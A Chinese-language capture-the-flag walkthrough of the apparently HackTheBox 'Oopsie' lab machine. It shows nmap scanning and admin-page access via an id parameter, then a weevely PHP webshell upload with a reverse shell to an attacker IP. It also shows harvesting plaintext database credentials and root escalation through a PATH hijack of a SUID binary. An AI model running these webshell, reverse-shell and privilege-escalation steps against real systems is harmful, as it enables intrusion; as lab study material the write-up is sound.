一.sudo nmap -sC -sV -oN Oopsie.nmap 10.129.210.24
    port 22  OpenSSH 7.6p1 Ubuntu
    port 80  Apache httpd 2.4.29 ((Ubuntu))

二.http://10.129.95.241/cdn-cgi/login/admin.php?content=accounts&id=2
    id  Access ID	Name	Email
    1   34322	admin	admin@megacorp.com
    2   2233	guest	guest@megacorp.com
    4   8832	john	john@tafcz.co.uk
    13  57633	Peter	peter@qpic.co.uk
    23  28832	Rafol	tom@rafol.co.uk
    30  86575	super admin	superadmin@megacorp.com

    Brand ID	Model	Price
    2	MC-2124	$100,430

    Client ID	Name	Email
    2	client	client@client.htb

三.上传php木马文件，拿到www-data权限
    一、
    制作木马：weevely generate 123 hello.php
    链接木马：weevely http://10.129.95.241/uploads/hello.php 123
    反弹shell模块：backdoor_reversetcp  10.10.16.174 4444

    二、
    或者kali的webshells目录：/usr/share/webshells/php-reverse-shell.php
        更好shell交互界面：python3 -c 'import pty;pty.spawn("/bin/bash")'

四.查看网站目录下的文件，获取用户密码：
    1.
    www-data@oopsie:/var/www/html/cdn-cgi/login$ cat * | grep -i passw*
    if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")
    <input type="password" name="password" placeholder="Password" />
    2.
    www-data@oopsie:/var/www/html/cdn-cgi/login $ cat db.php
    <?php
    $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
    ?>

  得到密码admin/MEGACORP_4dm1n!!  ，  robert/M3g4C0rpUs3r!

五.拿到robert用户权限后，尝试提权到root。
    1.sudo -l；  ==> 无sudo权限
    2.id查看用户组;  ==> bugtracker组
    3.find / -group bugtracker 2>/dev/null；  ==> /usr/bin/bugtracker可执行文件
    4.ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker；  ==>  查看文件可利用点：suid

    5./usr/bin/bugtracker提权; ==>
        robert@oopsie:$ cd tmp
        robert@oopsie:/tmp$ touch cat
        robert@oopsie:/tmp$ echo "/bin/sh" > cat
        robert@oopsie:/tmp$ chmod +x cat
        robert@oopsie:/tmp$ export PATH=/tmp:$PATH
        robert@oopsie:/tmp$ bugtracker
        robert@oopsie:/tmp$ bugtracker
            bugtracker

            ------------------
            : EV Bug Tracker :
            ------------------

            Provide Bug ID: 1
            1
            ---------------

            # whoami
            root
            # python3 -c 'import pty;pty.spawn("/bin/bash")'
            root@oopsie:/tmp#/bin/cat /root/root.txt

    6.另一种思路/usr/bin/bugtracker; ==>
        Bug ID输入:  ../root.txt
        bugtracker内部会调用 "cat /root/reports/../root.txt"



